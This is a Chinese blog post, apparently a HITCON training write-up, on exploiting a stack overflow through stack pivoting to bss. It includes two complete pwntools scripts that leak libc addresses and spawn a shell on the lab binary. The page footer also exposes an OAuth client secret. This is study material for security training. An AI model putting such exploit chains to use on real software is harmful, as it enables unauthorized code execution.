
<!doctype html>














<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/assets/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/assets/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/assets/css/main.css?v=5.1.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="stack,leave_stack," />





  <link rel="alternate" href="/atom.xml" title="Chivalry" type="application/atom+xml" />




  <link rel="shortcut icon" type="image/x-icon" href="/assets/favicon.ico?v=5.1.1" />
















<meta name="description" content="栈溢出——栈迁移">
<meta name="keywords" content="stack, leave_stack">
<meta property="og:type" content="article">
<meta property="og:title" content="lab6_migration">
<meta property="og:url" content="http://localhost:4000/hitcon_trainning/2019/07/11/migration/">
<meta property="og:site_name" content="Chivalry">
<meta property="og:description" content="栈溢出——栈迁移">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20190711163002203.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20190711163153310.png">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="lab6_migration">
<meta name="twitter:description" content="栈溢出——栈迁移">
<meta name="twitter:image" content="https://img-blog.csdnimg.cn/20190711163002203.png">


<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '',
    scheme: 'Mist',
    sidebar: {"position":"left","display":"post","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://localhost:4000/"/>





  <title>lab6_migration | Chivalry</title>
  






  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?ff6a93bdd23ba3d7a62f625966d58e96";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>











</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"> <div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Chivalry</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

<div id="posts" class="posts-expand">
  
  

  

  
  
  

  <article class="post post-type- " itemscope itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="http://localhost:4000/hitcon_trainning/2019/07/11/migration/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Cyth">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="assets/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Chivalry">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
          
          
            lab6_migration
          
        </h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-07-11T00:00:00+08:00">
                2019-07-11
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/category/#/hitcon_trainning" itemprop="url" rel="index">
                    <span itemprop="name">hitcon_trainning</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          
            
                <div class="post-description">
                    
                </div>
            
          

        </div>
      </header>
    

    <div class="post-body" itemprop="articleBody">

      
      

      
        
  
  












  <p><strong><font style="font-size:25px"> 栈溢出——栈迁移</font></strong></p>

<h1 id="错误思路">错误思路</h1>

<h2 id="漏洞">漏洞</h2>

<p>栈溢出<br />
<img src="https://img-blog.csdnimg.cn/20190711163002203.png" alt="avatar" /><br />
这里的buf溢出了0x40-0x28 个字节</p>

<p>checksec比较友好，没有开地址随机化。</p>

<h2 id="解决">解决</h2>

<p>是一个ret2libc的题目，返回到puts打印libc_start_main的got表地址，确定libc的版本。<br />
这里有一个问题就是我不知道这个count如果在我返回到libc_start_main的话是不是会被初始化，我先试一下。<br />
然后计算system和/bin/sh， 返回到这里。</p>

<p>不行。因为这个libc的基址是后面计算才知道的，没法提前就写进去。</p>

<h1 id="正确">正确</h1>

<p>不是这么搞的= =，好累。<br />
正确的思路是栈迁移。</p>

<h2 id="漏洞-1">漏洞</h2>

<p>还是栈溢出啊。判断是栈迁移的原因有几点<br />
    1. 因为count那个地方其实是一个hint，告诉你ret2libc是行不通的。
    2. 能够构造成payload的长度是0x40-0x28其实只有0x18太短了。
    3. 因为system的地址是算出来的，所以要多次输入，也就是多次返回到read，但是不能直接返回到main函数里面，所以说需要直接返回到read，并且多次通过read再一次栈溢出控制程序流程，所以需要控制栈的地址。但是实在程序加载的时候你是没法确定栈地址的[反正我现在不可以确定]，于是就是栈迁移！</p>

<h2 id="思路">思路</h2>

<p>栈迁移的基本思路是用leave；ret；</p>

<p>leave;ret;</p>
<pre><code class="language-asm">mov %ebp,%esp
pop %ebp
pop %eip
</code></pre>

<p>这样就可以把esp劫持走。</p>

<p>这道题可以把栈迁移到bss。权限和大小是够的。</p>

<p>过程</p>
<ol>
  <li>第一次系统自带的read栈溢出需要打印基址以及实现栈迁移。选择bss段一个中间位置，瞎选一个bss+0x500
栈的构造应该是
    <pre><code class="language-asm">esp junk data
 ......
ebp bss+0x500
 put_plt
 pop1ret
 libc_start_main_got
 read_plt
 leave_ret
 0
 bss+0x500
 0x100
</code></pre>
  </li>
  <li>第二次的栈溢出需要输入/bin/sh，然后执行system。</li>
</ol>

<p>栈的构造是</p>
<pre><code class="language-asm">esp/ebp bss+0x400
        read_plt
        pop3ret
        0
        bss+0x400
        0x100
        system_addr
        0xdeadbeef
        bss+0x400(bin_sh_addr)

</code></pre>
<p>pop1ret和pop3ret：
<img src="https://img-blog.csdnimg.cn/20190711163153310.png" alt="在这里插入图片描述" /></p>

<p><strong>错误</strong>： 第一次不能实现这么多功能，他只有0x18个数据，payload长度超了。<br />
所以要把他分成两次</p>

<ol>
  <li>第一次</li>
</ol>

<pre><code class="language-asm">esp junk data
    ... ...
ebp bss+0x500
    read_plt
    leave_ret
    0
    bss+0x500
    0x100
</code></pre>

<ol>
  <li>第二次</li>
</ol>

<pre><code class="language-asm">esp/ebp bss+0x400
        put_plt
        pop1ret
        libc_start_main_got
        read_plt
        leave_ret
        0
        bss+0x400
        0x100
</code></pre>
<ol>
  <li>第三次</li>
</ol>

<pre><code class="language-asm">esp/ebp bss+0x500
        read_plt
        pop3ret
        0
        bss+0x500
        0x100
        system_addr
        0xdeadbeef
        bss+0x500
</code></pre>

<h1 id="exp">exp</h1>

<div class="language-python highlighter-rouge"><div class="highlight"><table style="margin: 0px"><tbody><tr><td class="gutter"><pre>1<br/>2<br/>3<br/>4<br/>5<br/>6<br/>7<br/>8<br/>9<br/>10<br/>11<br/>12<br/>13<br/>14<br/>15<br/>16<br/>17<br/>18<br/>19<br/>20<br/>21<br/>22<br/>23<br/>24<br/>25<br/>26<br/>27<br/>28<br/>29<br/>30<br/>31<br/>32<br/>33<br/>34<br/>35<br/>36<br/>37<br/>38<br/>39<br/>40<br/>41<br/>42</pre></td><td class="code"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span>
<span class="kn">from</span> <span class="nn">LibcSearcher</span> <span class="kn">import</span> <span class="o">*</span>


<span class="n">context</span><span class="o">.</span><span class="n">log_level</span><span class="o">=</span><span class="s">'debug'</span>
<span class="n">sh</span><span class="o">=</span><span class="n">process</span><span class="p">(</span><span class="s">'./migration'</span><span class="p">)</span>
<span class="n">elf</span><span class="o">=</span><span class="n">ELF</span><span class="p">(</span><span class="s">"./migration"</span><span class="p">)</span>
<span class="n">pause</span><span class="p">()</span>

<span class="n">libc_start_main_got</span><span class="o">=</span><span class="n">elf</span><span class="o">.</span><span class="n">got</span><span class="p">[</span><span class="s">'__libc_start_main'</span><span class="p">]</span>
<span class="n">puts_plt</span><span class="o">=</span><span class="n">elf</span><span class="o">.</span><span class="n">plt</span><span class="p">[</span><span class="s">'puts'</span><span class="p">]</span>
<span class="n">read_plt</span><span class="o">=</span><span class="n">elf</span><span class="o">.</span><span class="n">plt</span><span class="p">[</span><span class="s">'read'</span><span class="p">]</span>
<span class="n">bss_addr</span><span class="o">=</span><span class="n">elf</span><span class="o">.</span><span class="n">bss</span><span class="p">()</span>
<span class="n">pop1ret</span><span class="o">=</span><span class="mh">0x0804836d</span>
<span class="n">pop3ret</span><span class="o">=</span><span class="mh">0x08048569</span>
<span class="n">leave_ret</span><span class="o">=</span><span class="mh">0x08048418</span>
<span class="n">offset</span><span class="o">=</span><span class="mh">0x28</span>

<span class="c">#------------move stack-----------</span>
<span class="n">payload</span><span class="o">=</span><span class="n">flat</span><span class="p">([</span><span class="s">'A'</span><span class="o">*</span><span class="n">offset</span><span class="p">,</span><span class="n">bss_addr</span><span class="o">+</span><span class="mh">0x500</span><span class="p">,</span><span class="n">read_plt</span><span class="p">,</span><span class="n">leave_ret</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="n">bss_addr</span><span class="o">+</span><span class="mh">0x500</span><span class="p">,</span><span class="mh">0x100</span><span class="p">])</span>
<span class="n">sh</span><span class="o">.</span><span class="n">sendafter</span><span class="p">(</span><span class="s">"best :</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="n">payload</span><span class="p">)</span>

<span class="c">#-----------leak libc base-------</span>
<span class="n">payload</span><span class="o">=</span><span class="n">flat</span><span class="p">([</span><span class="n">bss_addr</span><span class="o">+</span><span class="mh">0x400</span><span class="p">,</span><span class="n">puts_plt</span><span class="p">,</span><span class="n">pop1ret</span><span class="p">,</span><span class="n">libc_start_main_got</span><span class="p">,</span><span class="n">read_plt</span><span class="p">,</span><span class="n">leave_ret</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="n">bss_addr</span><span class="o">+</span><span class="mh">0x400</span><span class="p">,</span><span class="mh">0x100</span><span class="p">])</span>
<span class="n">sh</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span>

<span class="n">libc_start_main_addr</span><span class="o">=</span><span class="n">u32</span><span class="p">(</span><span class="n">sh</span><span class="o">.</span><span class="n">recv</span><span class="p">()[</span><span class="mi">0</span><span class="p">:</span><span class="mi">4</span><span class="p">])</span>

<span class="k">print</span> <span class="s">'libc_start_main_got----------&gt;{:x}'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">libc_start_main_addr</span><span class="p">)</span>
<span class="n">libc</span><span class="o">=</span><span class="n">LibcSearcher</span><span class="p">(</span><span class="s">'__libc_start_main'</span><span class="p">,</span><span class="n">libc_start_main_addr</span><span class="p">)</span>
<span class="n">libcbase</span><span class="o">=</span><span class="n">libc_start_main_addr</span><span class="o">-</span><span class="n">libc</span><span class="o">.</span><span class="n">dump</span><span class="p">(</span><span class="s">'__libc_start_main'</span><span class="p">)</span>

<span class="n">system_addr</span><span class="o">=</span><span class="n">libcbase</span><span class="o">+</span><span class="n">libc</span><span class="o">.</span><span class="n">dump</span><span class="p">(</span><span class="s">'system'</span><span class="p">)</span>
<span class="k">print</span> <span class="s">'system-----------------------&gt;{:x}'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">system_addr</span><span class="p">)</span>

<span class="c">#---------get shell---------------</span>
<span class="n">payload</span><span class="o">=</span><span class="n">flat</span><span class="p">([</span><span class="n">bss_addr</span><span class="o">+</span><span class="mh">0x500</span><span class="p">,</span><span class="n">read_plt</span><span class="p">,</span><span class="n">pop3ret</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="n">bss_addr</span><span class="o">+</span><span class="mh">0x500</span><span class="p">,</span><span class="mh">0x100</span><span class="p">,</span><span class="n">system_addr</span><span class="p">,</span><span class="mh">0xdeadbeef</span><span class="p">,</span><span class="n">bss_addr</span><span class="o">+</span><span class="mh">0x500</span><span class="p">])</span>
<span class="n">sh</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span>
<span class="n">sh</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="s">'/bin/sh</span><span class="se">\x00</span><span class="s">'</span><span class="p">)</span>

<span class="n">sh</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span>
<span class="n">sh</span><span class="o">.</span><span class="n">close</span><span class="p">()</span>
</code></pre></td></tr></tbody></table></div></div>

<h1 id="后记">后记</h1>

<p>本来想用libcsearch找/bin/sh的地址直接返回，但是谁能想到他太不争气了，和本机的libc版本不同导致不知道找了个啥东西，也不知道system是怎么找对的。
还被师傅骂一通TAT还diss我代码写的丑TAT</p>

<p>这里有一个trick，libc=elf.libc,然后就不用导入libc了。</p>
<div class="language-python highlighter-rouge"><div class="highlight"><table style="margin: 0px"><tbody><tr><td class="gutter"><pre>1<br/>2<br/>3<br/>4<br/>5<br/>6<br/>7<br/>8<br/>9<br/>10<br/>11<br/>12<br/>13<br/>14<br/>15<br/>16<br/>17<br/>18<br/>19<br/>20<br/>21<br/>22<br/>23<br/>24<br/>25<br/>26<br/>27<br/>28<br/>29<br/>30<br/>31<br/>32<br/>33<br/>34<br/>35<br/>36<br/>37<br/>38<br/>39<br/>40<br/>41<br/>42<br/>43</pre></td><td class="code"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span>

<span class="n">context</span><span class="o">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="s">'debug'</span>
<span class="n">sh</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s">'./migration'</span><span class="p">)</span>
<span class="n">elf</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s">"./migration"</span><span class="p">)</span>
<span class="n">libc</span> <span class="o">=</span> <span class="n">elf</span><span class="o">.</span><span class="n">libc</span>
<span class="n">context</span><span class="o">.</span><span class="n">binary</span> <span class="o">=</span> <span class="s">"./migration"</span>

<span class="n">libc_start_main_got</span> <span class="o">=</span> <span class="n">elf</span><span class="o">.</span><span class="n">got</span><span class="p">[</span><span class="s">'__libc_start_main'</span><span class="p">]</span>
<span class="n">puts_plt</span> <span class="o">=</span> <span class="n">elf</span><span class="o">.</span><span class="n">plt</span><span class="p">[</span><span class="s">'puts'</span><span class="p">]</span>
<span class="n">read_plt</span> <span class="o">=</span> <span class="n">elf</span><span class="o">.</span><span class="n">plt</span><span class="p">[</span><span class="s">'read'</span><span class="p">]</span>
<span class="n">bss_addr</span> <span class="o">=</span> <span class="n">elf</span><span class="o">.</span><span class="n">bss</span><span class="p">()</span>
<span class="n">pop1ret</span> <span class="o">=</span> <span class="mh">0x0804836d</span>
<span class="n">pop3ret</span> <span class="o">=</span> <span class="mh">0x08048569</span>
<span class="n">leave_ret</span> <span class="o">=</span> <span class="mh">0x08048418</span>
<span class="n">offset</span> <span class="o">=</span> <span class="mh">0x28</span>

<span class="c">#------------move stack-----------</span>
<span class="n">payload</span><span class="o">=</span><span class="n">flat</span><span class="p">([</span><span class="s">'A'</span><span class="o">*</span><span class="n">offset</span><span class="p">,</span><span class="n">bss_addr</span><span class="o">+</span><span class="mh">0x500</span><span class="p">,</span><span class="n">read_plt</span><span class="p">,</span><span class="n">leave_ret</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="n">bss_addr</span><span class="o">+</span><span class="mh">0x500</span><span class="p">,</span><span class="mh">0x100</span><span class="p">])</span>
<span class="n">sh</span><span class="o">.</span><span class="n">sendafter</span><span class="p">(</span><span class="s">"best :</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="n">payload</span><span class="p">)</span>

<span class="c">#-----------leak libc base-------</span>
<span class="n">payload</span><span class="o">=</span><span class="n">flat</span><span class="p">([</span><span class="n">bss_addr</span><span class="o">+</span><span class="mh">0x400</span><span class="p">,</span><span class="n">puts_plt</span><span class="p">,</span><span class="n">pop1ret</span><span class="p">,</span><span class="n">libc_start_main_got</span><span class="p">,</span><span class="n">read_plt</span><span class="p">,</span><span class="n">leave_ret</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="n">bss_addr</span><span class="o">+</span><span class="mh">0x400</span><span class="p">,</span><span class="mh">0x100</span><span class="p">])</span>
<span class="n">sh</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span>

<span class="n">libc_start_main_addr</span><span class="o">=</span><span class="n">u32</span><span class="p">(</span><span class="n">sh</span><span class="o">.</span><span class="n">recvn</span><span class="p">(</span><span class="mi">4</span><span class="p">))</span>

<span class="k">print</span> <span class="s">'libc_start_main_addr----------&gt;{:x}'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">libc_start_main_addr</span><span class="p">)</span>
<span class="n">libc</span><span class="o">.</span><span class="n">address</span> <span class="o">=</span> <span class="n">libc_start_main_addr</span> <span class="o">-</span> <span class="n">libc</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s">'__libc_start_main'</span><span class="p">]</span>

<span class="n">system_addr</span><span class="o">=</span><span class="n">libc</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s">'system'</span><span class="p">]</span>
<span class="n">bin_sh_addr</span><span class="o">=</span><span class="n">libc</span><span class="o">.</span><span class="n">search</span><span class="p">(</span><span class="s">'/bin/sh'</span><span class="p">)</span><span class="o">.</span><span class="nb">next</span><span class="p">()</span>
<span class="c"># pause()</span>

<span class="k">print</span> <span class="s">'system-----------------------&gt;{:x}'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">system_addr</span><span class="p">)</span>

<span class="c">#---------get shell---------------</span>
<span class="n">payload</span><span class="o">=</span><span class="n">flat</span><span class="p">([</span><span class="n">bss_addr</span><span class="o">+</span><span class="mh">0x500</span><span class="p">,</span><span class="n">system_addr</span><span class="p">,</span><span class="mh">0xdeadbeef</span><span class="p">,</span><span class="n">bin_sh_addr</span><span class="p">])</span>
<span class="n">sh</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span>

<span class="n">sh</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span>
<span class="n">sh</span><span class="o">.</span><span class="n">close</span><span class="p">()</span>

</code></pre></td></tr></tbody></table></div></div>


      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            
            <a href="/tag/#/stack" rel="tag"># stack</a>
          
            
            <a href="/tag/#/leave_stack" rel="tag"># leave_stack</a>
          
        </div>
      

      
      
      
      
      

      
      
        <div class="post-nav" id="post-nav-id">
          <div class="post-nav-next post-nav-item">
            
              <a href="/hitcon_trainning/2019/07/12/crack/" rel="next" title="lab7_crack">
                <i class="fa fa-chevron-left"></i> lab7_crack
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      
      

      
    </footer>
  </article>

  <div class="post-spread">
    
  </div>
</div>


<div id="gitmentContainer"></div>
<link rel="stylesheet" href="https://imsun.github.io/gitment/style/default.css">
<script src="https://imsun.github.io/gitment/dist/gitment.browser.js"></script>
<script>
var gitment = new Gitment({
    owner: 'CythZ',
    repo: 'https://github.com/CythZ/CythZ.github.io.git',
    oauth: {
        client_id: '7f9aa36ea2ba7a10b6ff',
        client_secret: '170fc93045774170b9952e46f249d8ea0d718a99',
    },
});
gitment.render('gitmentContainer');
</script>
          </div>
          


          
  <div class="comments" id="comments">
    
  </div>


        </div>
        
          

  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      
        
        
        







      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/assets/images/avatar.gif"
               alt="Cyth" />
          <p class="site-author-name" itemprop="name">Cyth</p>
           
              <p class="site-description motion-element" itemprop="description">认真勤奋就会有回报的赤诚。</p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives/">
                <span class="site-state-item-count">5</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/">
                <span class="site-state-item-count">1</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/">
                <span class="site-state-item-count">7</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        
        
        
          <div class="feed-link motion-element">
            <a href="/atom.xml" rel="alternate">
              <i class="fa fa-rss"></i>
              RSS
            </a>
          </div>
        

        <div class="links-of-author motion-element">
          
        </div>

        
        

        
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            








            
              <div class="post-toc-content">
    <ol class=nav>
      <li class="nav-item nav-level-1"> <a class="nav-link" href="#错误思路"> <span class="nav-number">1</span> <span class="nav-text">错误思路</span> </a> <ol class="nav-child"> <li class="nav-item nav-level-2"> <a class="nav-link" href="#漏洞"> <span class="nav-number">1.1</span> <span class="nav-text">漏洞</span> </a> </li> <li class="nav-item nav-level-2"> <a class="nav-link" href="#解决"> <span class="nav-number">1.2</span> <span class="nav-text">解决</span> </a> </li> </ol> </li> <li class="nav-item nav-level-1"> <a class="nav-link" href="#正确"> <span class="nav-number">2</span> <span class="nav-text">正确</span> </a> <ol class="nav-child"> <li class="nav-item nav-level-2"> <a class="nav-link" href="#漏洞-1"> <span class="nav-number">2.1</span> <span class="nav-text">漏洞</span> </a> </li> <li class="nav-item nav-level-2"> <a class="nav-link" href="#思路"> <span class="nav-number">2.2</span> <span class="nav-text">思路</span> </a> </li> </ol> </li> <li class="nav-item nav-level-1"> <a class="nav-link" href="#exp"> <span class="nav-number">3</span> <span class="nav-text">exp</span> </a> </li> <li class="nav-item nav-level-1"> <a class="nav-link" href="#后记"> <span class="nav-number">4</span> <span class="nav-text">后记</span> </a> </li>
    </ol>
  </div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>

        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  
  &copy; 
  <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Cyth</span>
</div>


<div class="powered-by">
  由 <a class="theme-link" href="https://jekyllrb.com">Jekyll</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/simpleyyt/jekyll-theme-next">
    NexT.Mist
  </a>
</div>


        

        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>





















  
   
  
  
  
  
  
  <script type="text/javascript" src="/assets/lib/jquery/index.js?v=2.1.3"></script>

  
  
  
  
  
  <script type="text/javascript" src="/assets/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  
  
  
  
  <script type="text/javascript" src="/assets/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  
  
  
  
  <script type="text/javascript" src="/assets/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  
  
  
  
  <script type="text/javascript" src="/assets/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  
  
  
  
  <script type="text/javascript" src="/assets/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>

  
  
  
  
  
  <script type="text/javascript" src="/assets/lib/canvas-nest/canvas-nest.min.js"></script>


  


  <script type="text/javascript" src="/assets/js/src/utils.js?v=5.1.1"></script>

  <script type="text/javascript" src="/assets/js/src/motion.js?v=5.1.1"></script>



  
  

  <script type="text/javascript" src="/assets/js/src/scrollspy.js?v=5.1.1"></script>
<script type="text/javascript" src="/assets/js/src/post-details.js?v=5.1.1"></script>


  


  <script type="text/javascript" src="/assets/js/src/bootstrap.js?v=5.1.1"></script>



  


  




	





  











  




  

    

  







  






  

  

  
  


  

  

  

</body>
</html>

